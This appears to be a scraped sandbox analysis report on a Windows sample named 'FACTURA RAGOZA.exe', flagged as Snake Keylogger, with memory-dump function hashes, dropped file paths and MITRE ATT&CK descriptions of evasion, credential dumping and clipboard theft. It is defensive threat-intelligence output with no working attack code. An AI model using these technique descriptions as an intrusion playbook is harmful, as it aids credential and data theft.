Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1221d51da794c4b52bcc3e9e4e4faa99a98b989a15af6640c94664dd5bf5c29b
Instruction ID: 65cb13ab12a99bde1250061e82cace3ea918c6cdbd5d1fe7cccf275f81210226
Opcode Fuzzy Hash: 1221d51da794c4b52bcc3e9e4e4faa99a98b989a15af6640c94664dd5bf5c29b
Instruction Fuzzy Hash: 5DD0C93A714128AB4B052E49A8088AE7F6EEBDD771714902AF90987700CEB68D1297E5

Function 0047AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2923571373.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_470000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb920365c77b8b859a1b7110b34678a5844e3afffb2badc8e79a49363601365c
Instruction ID: cdca06ed00308fb86ec4af4a8121ae10e089d913e648652246d020fd8b0b0f9d
Opcode Fuzzy Hash: bb920365c77b8b859a1b7110b34678a5844e3afffb2badc8e79a49363601365c
Instruction Fuzzy Hash: 86D0673AB40018DFCB04DF99E840CDDF7B6FBA8221B148116E925A3261CA319925DB54

Function 00476748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2923571373.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_470000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f1e43aacb16030ed5197c71631011ebae06ae2784b7beb96c9a7b0efa86ec9
Instruction ID: 7e8ab36388cb34e2eda2b3e8798e2b03096b9e101afb9269b79016673684632b
Opcode Fuzzy Hash: 77f1e43aacb16030ed5197c71631011ebae06ae2784b7beb96c9a7b0efa86ec9
Instruction Fuzzy Hash: 6EC012351443088EC501FB6ADD4A555775FEAD0604B40D520B0051665EEF7C99894698

Non-executed Functions

Function 00477118 Relevance: 6.6, Strings: 5, Instructions: 370COMMON

Download Yara Rule

Strings

(o^q, xrefs: 00477220
(o^q, xrefs: 0047753D
,bq, xrefs: 0047728A
(o^q, xrefs: 00477212
,bq, xrefs: 00477298

Memory Dump Source

Source File: 00000006.00000002.2923571373.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_470000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2525668591
Opcode ID: a0022184227113bcf7cd2a1082f6e8c6addcfc701a2026b6d0719c9b95a108f6
Instruction ID: 527f4e89db67a2cdc535f9ca9b474da848d0b10fbf92a012b25dc4c3cd95936c
Opcode Fuzzy Hash: a0022184227113bcf7cd2a1082f6e8c6addcfc701a2026b6d0719c9b95a108f6
Instruction Fuzzy Hash: 88E13D30A04115DFCB14CFA9C984ADEBBB2BF59304FA5C466E819AB361D738EC41CB55

Function 23C30040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

.5vq, xrefs: 23C3015B

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID: .5vq
API String ID: 0-493797296
Opcode ID: 1e188ce3bab9a8e535919f0726eb07c3fe860b457e4d23401f170fb9fd4d459b
Instruction ID: 1ab2381cb6b1538573206179bc58a09a1e7e080cc0c568613d26eec91a3212b6
Opcode Fuzzy Hash: 1e188ce3bab9a8e535919f0726eb07c3fe860b457e4d23401f170fb9fd4d459b
Instruction Fuzzy Hash: D752A174D01228CFDB64DF69C984B9DBBB2BB89301F1081E9E409AB355DB359E81CF50

Function 23C3F3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 001c86b3a9223d12c7c00ed2fab893971ae17596d8aeda82eedd630d83874b4b
Instruction ID: 822dfc5679721f70e09d451c4366a9918bf8c95e7b9a1823a5817b3d019d8794
Opcode Fuzzy Hash: 001c86b3a9223d12c7c00ed2fab893971ae17596d8aeda82eedd630d83874b4b
Instruction Fuzzy Hash: E9C19174E00218CFDB54DFA9C994B9DBBB2EF89304F1081A9D409BB365DB359A85CF50

Function 23C3EF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e615422483508afb07b7239e9397137fe9d0e2fd612d3cc7f26494f403459c0
Instruction ID: e7bc22b2b6e3fe45424d0d930fa678644dca5b57a0185c11b169900fe29c1cc0
Opcode Fuzzy Hash: 0e615422483508afb07b7239e9397137fe9d0e2fd612d3cc7f26494f403459c0
Instruction Fuzzy Hash: 44C18074E00218CFDB54DFA9C994B9DBBB2EF89304F2081A9D409BB365DB359A85CF50

Function 23C3EB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d692247ff1a1f16fa4546550c6caf565b2e1bb13e27904405ac0177d8afe824
Instruction ID: 1d6c6c701a06d0b4bcf4e95744121b7bb88e0810536d36e7397b412a32d39f70
Opcode Fuzzy Hash: 5d692247ff1a1f16fa4546550c6caf565b2e1bb13e27904405ac0177d8afe824
Instruction Fuzzy Hash: 33C19075E00218CFDB14DFA9C984B9DBBB2EF89304F1081A9D409BB365DB359A85CF50

Function 23C3E6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f740a5139438c0df5a23e2186101c7fd35697e6a6a9ed83f9f0583c43480b75e
Instruction ID: 3e5b6707be3e0b7f7a114fb8ac6e91244cec7ed76d328033499a21aea68018f2
Opcode Fuzzy Hash: f740a5139438c0df5a23e2186101c7fd35697e6a6a9ed83f9f0583c43480b75e
Instruction Fuzzy Hash: 9AC19F75E00218CFDB14DFA9C984B9DBBB2EF89304F1081A9D409BB365DB359A85CF50

Function 23C3E258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a8fa9dd051ef06d58d2aaef2aa616728872191754cfb37cd33c7e631836535c
Instruction ID: 3052274b1ba52f7014a4cc3a3b015b890c5064390d2958b6cbce156862c6aebc
Opcode Fuzzy Hash: 1a8fa9dd051ef06d58d2aaef2aa616728872191754cfb37cd33c7e631836535c
Instruction Fuzzy Hash: 1DC19075E00218CFDB54DFA9C984B9DBBB2EF89304F1081A9D409BB365DB359A85CF50

Function 23C3DE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f98c7644e7573a9957d8880c32266bc22ab86ea03015f9c7d9869382438bd05
Instruction ID: 34383c97cfe0432191ff72dfbf7d7e2c2abb8a3397bef1fec438e2cf379b6e2f
Opcode Fuzzy Hash: 4f98c7644e7573a9957d8880c32266bc22ab86ea03015f9c7d9869382438bd05
Instruction Fuzzy Hash: CDC19174E00218CFDB54DFA9C994B9DBBB2EF89304F1081AAE409BB355DB359A85CF50

Function 23C3D9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f35b5220c2636b77cb0a9fd6d3d1bb85e57b0def33ee3debbca3b28402142e25
Instruction ID: dbb33d2026f7446793f50e9f0e0f1a7762ee8462ee8deee551130c8cfaf7fb51
Opcode Fuzzy Hash: f35b5220c2636b77cb0a9fd6d3d1bb85e57b0def33ee3debbca3b28402142e25
Instruction Fuzzy Hash: B5C18174E00218CFDB54DFA9C994B9DBBB2EF89304F1081AAE409BB355DB359A85CF50

Function 23C3D550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89635bca98695f2538f50043e7a1002a77a012aea2ad3fa630fda38be5876434
Instruction ID: b22f4d3fdb07538a5047d037ac08241f5e1c6e0583e222a4fc39b33d9de79d68
Opcode Fuzzy Hash: 89635bca98695f2538f50043e7a1002a77a012aea2ad3fa630fda38be5876434
Instruction Fuzzy Hash: B5C18074E00218CFDB54DFA9C994B9DBBB2EF89304F1081AAE409BB355DB359A85CF50

Function 23C3D0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e358743fbe74ff69bd4ecbe2a68525d26452f8fa6cb5d720d7c5179713c3577
Instruction ID: c063e4d35ed1e0948363fbaa8402f4079f30e778114e9279191f4b226ba845c5
Opcode Fuzzy Hash: 3e358743fbe74ff69bd4ecbe2a68525d26452f8fa6cb5d720d7c5179713c3577
Instruction Fuzzy Hash: C8C18174E00218CFDB54DFA9C954B9DBBB2EF89304F1081AAE409AB365DB359A85CF50

Function 23C3CCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d04d6394c1d8a35388b18a9bcf416bb650a09db19ac49bcca836d18c68c69678
Instruction ID: 9973272afea64fcd5d08d55fc10f3115c0b4e17789e50657287ad73596a39b9f
Opcode Fuzzy Hash: d04d6394c1d8a35388b18a9bcf416bb650a09db19ac49bcca836d18c68c69678
Instruction Fuzzy Hash: B0C19174E00218CFDB54DFA9C954B9DBBB2EF89304F1081AAE409BB355DB359A85CF50

Function 23C3F810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2940608490.0000000023C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 23C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_23c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6fd2ebe6d61cd33ffe4532d62a8fb0d4a5efb0bf587d90ee983b1562178a0b
Instruction ID: 4e73363ba1539fbdbdf50c2c143a32f74f48befe9964edb49d35ae557880515e
Opcode Fuzzy Hash: 5d6fd2ebe6d61cd33ffe4532d62a8fb0d4a5efb0bf587d90ee983b1562178a0b
Instruction Fuzzy Hash: 32C18074E00318CFDB54DFA9C994B9DBBB2EF89304F1081A9D809AB365DB359A85CF50

Function 0047F974 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2923571373.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_470000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621a32d7075952a46497875d30235866521c9b89cc4a2d39cac60bc6dcbdbde5
Instruction ID: 0d6fdc085cd20b2a6969fdf53c6e162209a39932251e24e5b67b53e3e62499b3
Opcode Fuzzy Hash: 621a32d7075952a46497875d30235866521c9b89cc4a2d39cac60bc6dcbdbde5
Instruction Fuzzy Hash: 86C18174E00218CFDB54DFA9C954B9DBBB2EF89304F1081AAD409AB365DB359A85CF50

Function 0047F2C0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2923571373.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_470000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e63bac6bba4a95432a13fda84961ade3b3873516bb5b90c72f7fb52b626c7a
Instruction ID: ebdc383f7a668e3d96915cfb9b6da17d232d52d5877bc581262e170bc52ecea3
Opcode Fuzzy Hash: a2e63bac6bba4a95432a13fda84961ade3b3873516bb5b90c72f7fb52b626c7a
Instruction Fuzzy Hash: 1E513870D01208CBDB04DFA9C5487EEBBB2FB89300F14D16AE408BB295DB799885CF58

Function 0047F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2923571373.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_470000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5366e9ba6168db75fbf4111d6f44af0a641c6ffe02dcda99f7c9a487b2d56057
Instruction ID: 552d05a8b093873f4063c9b455c0c15f1840ef12d0ef90b09697976e840f8ef6
Opcode Fuzzy Hash: 5366e9ba6168db75fbf4111d6f44af0a641c6ffe02dcda99f7c9a487b2d56057
Instruction Fuzzy Hash: F5513570D01208CBCB00DFA9D584BEEBBB2FB59304F20D16AE419BB295D7399885CF58

Function 00477700 Relevance: 10.4, Strings: 8, Instructions: 450COMMON

Download Yara Rule

Strings

(o^q, xrefs: 00477C0F
,bq, xrefs: 00477BA0
(o^q, xrefs: 0047772E
(o^q, xrefs: 004777E9
(o^q, xrefs: 004778B2
,bq, xrefs: 00477B90
(o^q, xrefs: 00477BFF
(o^q, xrefs: 00477815

Memory Dump Source

Source File: 00000006.00000002.2923571373.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_470000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: a015a300ed3bc0c1c95967e0d66f7b2710ef1bbe1709e6b618a89ad59baf3be1
Instruction ID: 6189b8d3b01f73e496578dc71c8efcd22f7cf1bfd0fcc51feeb58acdb641f822
Opcode Fuzzy Hash: a015a300ed3bc0c1c95967e0d66f7b2710ef1bbe1709e6b618a89ad59baf3be1
Instruction Fuzzy Hash: A2126830A042088FCB25DF69C984ADEBBF2FF48314F5585AAE419AB361D734ED45CB94

Function 004776F1 Relevance: 5.3, Strings: 4, Instructions: 273COMMON

Download Yara Rule

Strings

(o^q, xrefs: 0047772E
(o^q, xrefs: 004777E9
(o^q, xrefs: 004778B2
(o^q, xrefs: 00477815

Memory Dump Source

Source File: 00000006.00000002.2923571373.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_470000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: 9c0913bd739cb830ff8d2c4ac213b008e7d6a7bf083b0b517b38597818fab7f2
Instruction ID: 4563eaee68a61824a26fe924df3fb8187334af1c1be156410ee3c65443bbd15f
Opcode Fuzzy Hash: 9c0913bd739cb830ff8d2c4ac213b008e7d6a7bf083b0b517b38597818fab7f2
Instruction Fuzzy Hash: E7C14770A042089FCB14CFA9C984ADEBBF2BF48304F55855AE819EB361D734ED41CB94

Function 00476920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 0047695E
\;^q, xrefs: 00476952
\;^q, xrefs: 0047692C
\;^q, xrefs: 00476936

Memory Dump Source

Source File: 00000006.00000002.2923571373.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_470000_msiexec.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 85e058ebae2550a7d36189e75127732a36e7f8b24ad62ca839f67dd92b0b3960
Instruction ID: 731cdf57fb39d2402b7004ca7f99334bc7ce5afb32aaa9977b61deb2596468b2
Opcode Fuzzy Hash: 85e058ebae2550a7d36189e75127732a36e7f8b24ad62ca839f67dd92b0b3960
Instruction Fuzzy Hash: 4001D4F1740A048FCB248E2DC5449A637EBAFC8B60726C46BE64ADF3B4DA35DC418795

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FACTURA RAGOZA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ifvhfv4.o2u.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkoa3b0y.fap.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdmeaber.j2j.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yw5dnaeu.yh1.psm1

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\discourteously.gam

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\psychograph.rut

